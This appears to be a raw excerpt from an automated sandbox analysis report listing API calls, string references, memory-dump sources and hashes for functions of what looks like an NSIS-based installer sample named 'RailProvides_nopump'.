                                                                    • Associated: 00000000.00000002.2043796056.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RailProvides_nopump.jbxd
                                                                    Similarity
                                                                    • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                    • String ID: F
                                                                    • API String ID: 941294808-1304234792
                                                                    • Opcode ID: f4369597f17a3e87964d78a18e042c43d151941ad2c2ecd61bd33e0f0092c561
                                                                    • Instruction ID: e7530e13063599d95e155ed3b2c7b7521dfa2668d538c4695d9c695e9582dc0d
                                                                    • Opcode Fuzzy Hash: f4369597f17a3e87964d78a18e042c43d151941ad2c2ecd61bd33e0f0092c561
                                                                    • Instruction Fuzzy Hash: 01516C71400209AFCB058F95DE459AF7FB9FF45311F00802EF992AA1A0CB78DA55DFA4
                                                                    APIs
                                                                    • RegCreateKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004028DA
                                                                    • lstrlenW.KERNEL32(004130D8,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004028FD
                                                                    • RegSetValueExW.ADVAPI32(?,?,?,?,004130D8,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004029BC
                                                                    • RegCloseKey.ADVAPI32(?), ref: 004029E4
                                                                      • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                      • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                    Strings
                                                                    • WriteRegBin: "%s\%s" "%s"="%s", xrefs: 004029A1
                                                                    • WriteRegDWORD: "%s\%s" "%s"="0x%08x", xrefs: 00402959
                                                                    • WriteRegStr: "%s\%s" "%s"="%s", xrefs: 00402918
                                                                    • WriteReg: error creating key "%s\%s", xrefs: 004029F5
                                                                    • WriteReg: error writing into "%s\%s" "%s", xrefs: 004029D4
                                                                    • WriteRegExpandStr: "%s\%s" "%s"="%s", xrefs: 0040292A
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2043551602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.2043493177.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043579274.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043796056.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RailProvides_nopump.jbxd
                                                                    Similarity
                                                                    • API ID: lstrlen$CloseCreateValuewvsprintf
                                                                    • String ID: WriteReg: error creating key "%s\%s"$WriteReg: error writing into "%s\%s" "%s"$WriteRegBin: "%s\%s" "%s"="%s"$WriteRegDWORD: "%s\%s" "%s"="0x%08x"$WriteRegExpandStr: "%s\%s" "%s"="%s"$WriteRegStr: "%s\%s" "%s"="%s"
                                                                    • API String ID: 1641139501-220328614
                                                                    • Opcode ID: 51d35262b0c2a2c9e21de093e360e43a16013741a0d7e0050a8341ec78c57d1d
                                                                    • Instruction ID: 4ea7a0066738be70411365ddd6f3e5606018e51d84950e7919a1ab5782edcef9
                                                                    • Opcode Fuzzy Hash: 51d35262b0c2a2c9e21de093e360e43a16013741a0d7e0050a8341ec78c57d1d
                                                                    • Instruction Fuzzy Hash: 3D41BFB2D00209BFDF11AF90CE46DAEBBB9EB04704F20407BF505B61A1D6B94B509B59
                                                                    APIs
                                                                    • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,000000F0), ref: 00402EA9
                                                                    • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,000000F0), ref: 00402EC5
                                                                    • GlobalFree.KERNEL32(FFFFFD66), ref: 00402EFE
                                                                    • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,000000F0), ref: 00402F10
                                                                    • GlobalFree.KERNEL32(00000000), ref: 00402F17
                                                                    • CloseHandle.KERNEL32(?,?,?,?,?,000000F0), ref: 00402F2F
                                                                    • DeleteFileW.KERNEL32(?), ref: 00402F56
                                                                    Strings
                                                                    • created uninstaller: %d, "%s", xrefs: 00402F3B
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2043551602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.2043493177.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043579274.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043796056.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RailProvides_nopump.jbxd
                                                                    Similarity
                                                                    • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                                    • String ID: created uninstaller: %d, "%s"
                                                                    • API String ID: 3294113728-3145124454
                                                                    • Opcode ID: 7d19fd18931236c609f14dd9ebe02190de13aa3954742adab313f132dac73535
                                                                    • Instruction ID: 876417c632a2c352b67fb01c84f3ccb8dada3a759dccfb7ac575e016526b3130
                                                                    • Opcode Fuzzy Hash: 7d19fd18931236c609f14dd9ebe02190de13aa3954742adab313f132dac73535
                                                                    • Instruction Fuzzy Hash: E231B272800115BBCB11AFA4CE45DAF7FB9EF08364F10023AF555B61E1CB794E419B98
                                                                    APIs
                                                                    • CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,004062D4,00000000), ref: 004060FE
                                                                    • GetFileAttributesW.KERNEL32(0046A560,?,00000000,00000000,?,?,004062D4,00000000), ref: 0040613C
                                                                    • WriteFile.KERNEL32(00000000,000000FF,00000002,00000000,00000000,0046A560,40000000,00000004), ref: 00406175
                                                                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,0046A560,40000000,00000004), ref: 00406181
                                                                    • lstrcatW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00409678,?,00000000,00000000,?,?,004062D4,00000000), ref: 0040619B
                                                                    • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),?,?,004062D4,00000000), ref: 004061A2
                                                                    • WriteFile.KERNEL32(RMDir: RemoveDirectory invalid input(""),00000000,004062D4,00000000,?,?,004062D4,00000000), ref: 004061B7
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2043551602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.2043493177.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043579274.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043796056.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RailProvides_nopump.jbxd
                                                                    Similarity
                                                                    • API ID: File$Write$AttributesCloseHandlePointerlstrcatlstrlen
                                                                    • String ID: RMDir: RemoveDirectory invalid input("")
                                                                    • API String ID: 3734993849-2769509956
                                                                    • Opcode ID: db2296b131d449b30ff8990abd275774a0521ce3dbf342b3e8cfb01d18cadc82
                                                                    • Instruction ID: 719ae6cd10854ac59b0cdc08190af65770ef99398ad526dd54b0ef62760a23c4
                                                                    • Opcode Fuzzy Hash: db2296b131d449b30ff8990abd275774a0521ce3dbf342b3e8cfb01d18cadc82
                                                                    • Instruction Fuzzy Hash: 4621F271400200BBD710AB64DD88D9B376CEB02370B25C73AF626BA1E1E77449868BAD
                                                                    APIs
                                                                    • GetWindowLongW.USER32(?,000000EB), ref: 00403DE4
                                                                    • GetSysColor.USER32(00000000), ref: 00403E00
                                                                    • SetTextColor.GDI32(?,00000000), ref: 00403E0C
                                                                    • SetBkMode.GDI32(?,?), ref: 00403E18
                                                                    • GetSysColor.USER32(?), ref: 00403E2B
                                                                    • SetBkColor.GDI32(?,?), ref: 00403E3B
                                                                    • DeleteObject.GDI32(?), ref: 00403E55
                                                                    • CreateBrushIndirect.GDI32(?), ref: 00403E5F
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2043551602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.2043493177.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043579274.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043796056.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RailProvides_nopump.jbxd
                                                                    Similarity
                                                                    • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                    • String ID:
                                                                    • API String ID: 2320649405-0
                                                                    • Opcode ID: ac93da855729cb6ae330e7292f06b4dcfb528e6a29ab184958864ff4432b54b5
                                                                    • Instruction ID: efe235911933e34786796033030fc6f48e67331b78f43f6f4bde0ddab4ebbdd0
                                                                    • Opcode Fuzzy Hash: ac93da855729cb6ae330e7292f06b4dcfb528e6a29ab184958864ff4432b54b5
                                                                    • Instruction Fuzzy Hash: 7D1166715007046BCB219F78DE08B5BBFF8AF01755F048A2DE886F22A0D774DA48CB94
                                                                    APIs
                                                                    • GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 0040241C
                                                                      • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                                      • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                                      • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                                                      • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                                      • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                                      • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                                      • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                                      • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                      • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                    • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040242D
                                                                    • FreeLibrary.KERNEL32(?,?), ref: 004024C3
                                                                    Strings
                                                                    • Error registering DLL: Could not initialize OLE, xrefs: 004024F1
                                                                    • Error registering DLL: Could not load %s, xrefs: 004024DB
                                                                    • Error registering DLL: %s not found in %s, xrefs: 0040249A
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2043551602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.2043493177.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043579274.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043796056.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RailProvides_nopump.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSendlstrlen$Library$FreeHandleLoadModuleTextWindowlstrcatwvsprintf
                                                                    • String ID: Error registering DLL: %s not found in %s$Error registering DLL: Could not initialize OLE$Error registering DLL: Could not load %s
                                                                    • API String ID: 1033533793-945480824
                                                                    • Opcode ID: dad84e194389b7cbeb1d3ab4357ce8e64ef755489eaa46c5795f6130922e59d8
                                                                    • Instruction ID: e967fad4df15afb35ea17a6f8951328f27fda4bee3b51f855042d01f5ead75df
                                                                    • Opcode Fuzzy Hash: dad84e194389b7cbeb1d3ab4357ce8e64ef755489eaa46c5795f6130922e59d8
                                                                    • Instruction Fuzzy Hash: 34219131904208BBCF206FA1CE45E9E7A74AF40314F30817FF511B61E1D7BD4A819A5D
                                                                    APIs
                                                                      • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                      • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                      • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                                      • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                                      • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                                                      • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                                      • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                                      • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                                      • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                                      • Part of subcall function 00405C3F: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00457278,Error launching installer), ref: 00405C64
                                                                      • Part of subcall function 00405C3F: CloseHandle.KERNEL32(?), ref: 00405C71
                                                                    • WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00402288
                                                                    • GetExitCodeProcess.KERNEL32(?,?), ref: 00402298
                                                                    • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00402AF2
                                                                    Strings
                                                                    • Exec: failed createprocess ("%s"), xrefs: 004022C2
                                                                    • Exec: command="%s", xrefs: 00402241
                                                                    • Exec: success ("%s"), xrefs: 00402263
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2043551602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.2043493177.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043579274.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043796056.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RailProvides_nopump.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSendlstrlen$CloseHandleProcess$CodeCreateExitObjectSingleTextWaitWindowlstrcatwvsprintf
                                                                    • String ID: Exec: command="%s"$Exec: failed createprocess ("%s")$Exec: success ("%s")
                                                                    • API String ID: 2014279497-3433828417
                                                                    • Opcode ID: 6d54c557fbd6fdf8dc19518642d08f2325eb4e2a9a3136ddaf8bbf3ddc9e5317
                                                                    • Instruction ID: 1f9fd54ce4b92d80b15c686f19ace2d36b15c716f321f29b17dee5dd027f7fd2
                                                                    • Opcode Fuzzy Hash: 6d54c557fbd6fdf8dc19518642d08f2325eb4e2a9a3136ddaf8bbf3ddc9e5317
                                                                    • Instruction Fuzzy Hash: 3E11C632904115EBDB11BBE0DE46AAE3A61EF00314B24807FF501B50D1CBBC4D41D79D
                                                                    APIs
                                                                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404869
                                                                    • GetMessagePos.USER32 ref: 00404871
                                                                    • ScreenToClient.USER32(?,?), ref: 00404889
                                                                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 0040489B
                                                                    • SendMessageW.USER32(?,0000113E,00000000,?), ref: 004048C1
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2043551602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.2043493177.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043579274.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043796056.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RailProvides_nopump.jbxd
                                                                    Similarity
                                                                    • API ID: Message$Send$ClientScreen
                                                                    • String ID: f
                                                                    • API String ID: 41195575-1993550816
                                                                    • Opcode ID: e83bf87fd3d3de8100a00259917b631f02ad10d2ae0db71d55c08ccb040208c3
                                                                    • Instruction ID: 7db1728360bf3821ce9645a1193633f180912fe022e8629b13ab7a69f18166cd
                                                                    • Opcode Fuzzy Hash: e83bf87fd3d3de8100a00259917b631f02ad10d2ae0db71d55c08ccb040208c3
                                                                    • Instruction Fuzzy Hash: C5015E7290021CBAEB00DBA4DD85BEEBBB8AF54710F10452ABB50B61D0D7B85A058BA5
                                                                    APIs
                                                                    • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 0040326A
                                                                    • MulDiv.KERNEL32(00015600,00000064,?), ref: 00403295
                                                                    • wsprintfW.USER32 ref: 004032A5
                                                                    • SetWindowTextW.USER32(?,?), ref: 004032B5
                                                                    • SetDlgItemTextW.USER32(?,00000406,?), ref: 004032C7
                                                                    Strings
                                                                    • verifying installer: %d%%, xrefs: 0040329F
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2043551602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.2043493177.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043579274.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043796056.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RailProvides_nopump.jbxd
                                                                    Similarity
                                                                    • API ID: Text$ItemTimerWindowwsprintf
                                                                    • String ID: verifying installer: %d%%
                                                                    • API String ID: 1451636040-82062127
                                                                    • Opcode ID: 2242266ec469d88fb33e3e049bed9c2e1137abfcadbc35e47a6ba444652a7516
                                                                    • Instruction ID: 2210906da4c477318a924a5c8cf459ae641b3a2c10b729e3aa38b42dd2c8d99c
                                                                    • Opcode Fuzzy Hash: 2242266ec469d88fb33e3e049bed9c2e1137abfcadbc35e47a6ba444652a7516
                                                                    • Instruction Fuzzy Hash: 98014470610109ABEF109F60DD49FAA3B69FB00349F00803DFA46B51E0DB7996558B58
                                                                    APIs
                                                                    • lstrlenW.KERNEL32(00447240,%u.%u%s%s,?,00000000,00000000,?,FFFFFFDC,00000000,?,000000DF,00447240,?), ref: 0040444A
                                                                    • wsprintfW.USER32 ref: 00404457
                                                                    • SetDlgItemTextW.USER32(?,00447240,000000DF), ref: 0040446A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2043551602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.2043493177.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043579274.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043796056.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RailProvides_nopump.jbxd
                                                                    Similarity
                                                                    • API ID: ItemTextlstrlenwsprintf
                                                                    • String ID: %u.%u%s%s$@rD
                                                                    • API String ID: 3540041739-1813061909
                                                                    • Opcode ID: 62d1a696c90b95282af5dc14f7046faf50b68b39d5c561db380251ecdb666397
                                                                    • Instruction ID: f1896056faf18a44ee7e341cc3389f256aee6b01e91544d35c55ed1e8b934206
                                                                    • Opcode Fuzzy Hash: 62d1a696c90b95282af5dc14f7046faf50b68b39d5c561db380251ecdb666397
                                                                    • Instruction Fuzzy Hash: EF11BD327002087BDB10AA6A9D45E9E765EEBC5334F10423BFA15F30E1F6788A218679
                                                                    APIs
                                                                    • CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
                                                                    • CharNextW.USER32(?,?,?,00000000), ref: 004060AA
                                                                    • CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
                                                                    • CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2043551602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.2043493177.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043579274.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043796056.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RailProvides_nopump.jbxd
